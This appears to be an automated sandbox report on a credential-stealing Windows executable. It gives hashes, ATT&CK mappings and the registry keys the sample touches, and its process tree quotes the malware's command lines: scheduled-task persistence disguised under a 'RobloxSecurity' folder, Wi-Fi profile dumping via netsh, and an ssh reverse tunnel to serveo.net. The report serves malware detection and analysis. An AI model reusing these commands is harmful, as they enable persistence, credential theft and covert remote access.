e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601

General

Target

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Size

120KB
MD5

479d30cd484920e686388641718edc53
SHA1

c7040a1893168c204c759280d9671b0b58890c8c
SHA256

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601
SHA512

e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d
SSDEEP

1536:2Wzd3+6aUp+3aTvjgFnbF/nt6z9b1Caom02vrDxcHtcV/erWEUzny94BgJad:z3av3aTvjv9b1Ch30rDxcHtcV/SquI

Score

7^/10

collection discovery spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

Executes dropped EXE 2 IoCs

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

pid	process
5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
2980	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

31 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2184 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2852 timeout.exe

flow	ioc
31	ip-api.com

pid	process
2184	schtasks.exe

pid	process
2852	timeout.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

pid	process
5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
2980	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

description	pid	process
Token: SeDebugPrivilege	1340	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Token: SeDebugPrivilege	5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Token: SeDebugPrivilege	2980	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

pid	process
5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
2980	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.execmd.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.execmd.execmd.exee4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

description	pid	process	target process
PID 1340 wrote to memory of 4364	1340	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	cmd.exe
PID 1340 wrote to memory of 4364	1340	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	cmd.exe
PID 4364 wrote to memory of 2120	4364	cmd.exe	chcp.com
PID 4364 wrote to memory of 2120	4364	cmd.exe	chcp.com
PID 4364 wrote to memory of 2852	4364	cmd.exe	timeout.exe
PID 4364 wrote to memory of 2852	4364	cmd.exe	timeout.exe
PID 4364 wrote to memory of 2184	4364	cmd.exe	schtasks.exe
PID 4364 wrote to memory of 2184	4364	cmd.exe	schtasks.exe
PID 4364 wrote to memory of 5008	4364	cmd.exe	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
PID 4364 wrote to memory of 5008	4364	cmd.exe	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
PID 5008 wrote to memory of 2280	5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	cmd.exe
PID 5008 wrote to memory of 2280	5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	cmd.exe
PID 2280 wrote to memory of 2316	2280	cmd.exe	chcp.com
PID 2280 wrote to memory of 2316	2280	cmd.exe	chcp.com
PID 2280 wrote to memory of 2028	2280	cmd.exe	netsh.exe
PID 2280 wrote to memory of 2028	2280	cmd.exe	netsh.exe
PID 2280 wrote to memory of 3664	2280	cmd.exe	findstr.exe
PID 2280 wrote to memory of 3664	2280	cmd.exe	findstr.exe
PID 5008 wrote to memory of 5116	5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	cmd.exe
PID 5008 wrote to memory of 5116	5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	cmd.exe
PID 5116 wrote to memory of 1428	5116	cmd.exe	chcp.com
PID 5116 wrote to memory of 1428	5116	cmd.exe	chcp.com
PID 5116 wrote to memory of 1308	5116	cmd.exe	netsh.exe
PID 5116 wrote to memory of 1308	5116	cmd.exe	netsh.exe
PID 5116 wrote to memory of 3956	5116	cmd.exe	findstr.exe
PID 5116 wrote to memory of 3956	5116	cmd.exe	findstr.exe
PID 5008 wrote to memory of 4616	5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	ssh.exe
PID 5008 wrote to memory of 4616	5008	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	ssh.exe
PID 2980 wrote to memory of 4152	2980	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	ssh.exe
PID 2980 wrote to memory of 4152	2980	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe	ssh.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

outlook_win_path 1 IoCs

Processes:

e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe

C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
"C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4364

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:2120

C:\Windows\system32\timeout.exe
timeout /t 3
3⤵
- Delays execution with timeout.exe
PID:2852

C:\Windows\system32\schtasks.exe
schtasks /create /tn "e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2184

C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
"C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"
3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:5008

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
4⤵
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\system32\chcp.com
chcp 65001
5⤵
PID:2316

C:\Windows\system32\netsh.exe
netsh wlan show profiles
5⤵
PID:2028

C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
5⤵
PID:3664

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
4⤵
- Suspicious use of WriteProcessMemory
PID:5116

C:\Windows\system32\chcp.com
chcp 65001
5⤵
PID:1428

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
5⤵
PID:1308

C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
5⤵
PID:3956

C:\Windows\System32\OpenSSH\ssh.exe
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6240 serveo.net
4⤵
PID:4616

C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2980

C:\Windows\System32\OpenSSH\ssh.exe
"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6240 serveo.net
2⤵
PID:4152

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Unsecured Credentials

2

T1552

Credentials In Files

1

T1552.001

Credentials in Registry

1

T1552.002

Discovery

Query Registry

3

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

2

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe.log
Filesize
847B

MD5
3308a84a40841fab7dfec198b3c31af7

SHA1
4e7ab6336c0538be5dd7da529c0265b3b6523083

SHA256
169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

SHA512
97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

Download Submit
C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Filesize
120KB

MD5
479d30cd484920e686388641718edc53

SHA1
c7040a1893168c204c759280d9671b0b58890c8c

SHA256
e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601

SHA512
e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d

Download Submit
C:\Users\Admin\AppData\Local\lbdd1brp2p\p.dat
Filesize
4B

MD5
405075699f065e43581f27d67bb68478

SHA1
1a20cf59f0584ada3deeff6c1c5b4c11c691aec0

SHA256
7666197a246dded3b8238775f3cedf8350a2858a8117e744a703987dd55aa497

SHA512
c5eb5e284710fbc093bb55feae8a6623d0366db40a03cbd399d7173e06641dab84dad3cf5c0dc330b727498688093b9a7fc884f7afbe88c0627f963adc61deb1

Download Submit
memory/1340-0-0x00007FFE5FD83000-0x00007FFE5FD85000-memory.dmp

Filesize
8KB

Download
memory/1340-1-0x0000024C732B0000-0x0000024C732D4000-memory.dmp

Filesize
144KB

Download
memory/1340-4-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp

Filesize
10.8MB

Download
memory/1340-6-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp

Filesize
10.8MB

Download
memory/5008-11-0x00007FFE5DDE3000-0x00007FFE5DDE5000-memory.dmp

Filesize
8KB

Download
memory/5008-16-0x00007FFE5DDE3000-0x00007FFE5DDE5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads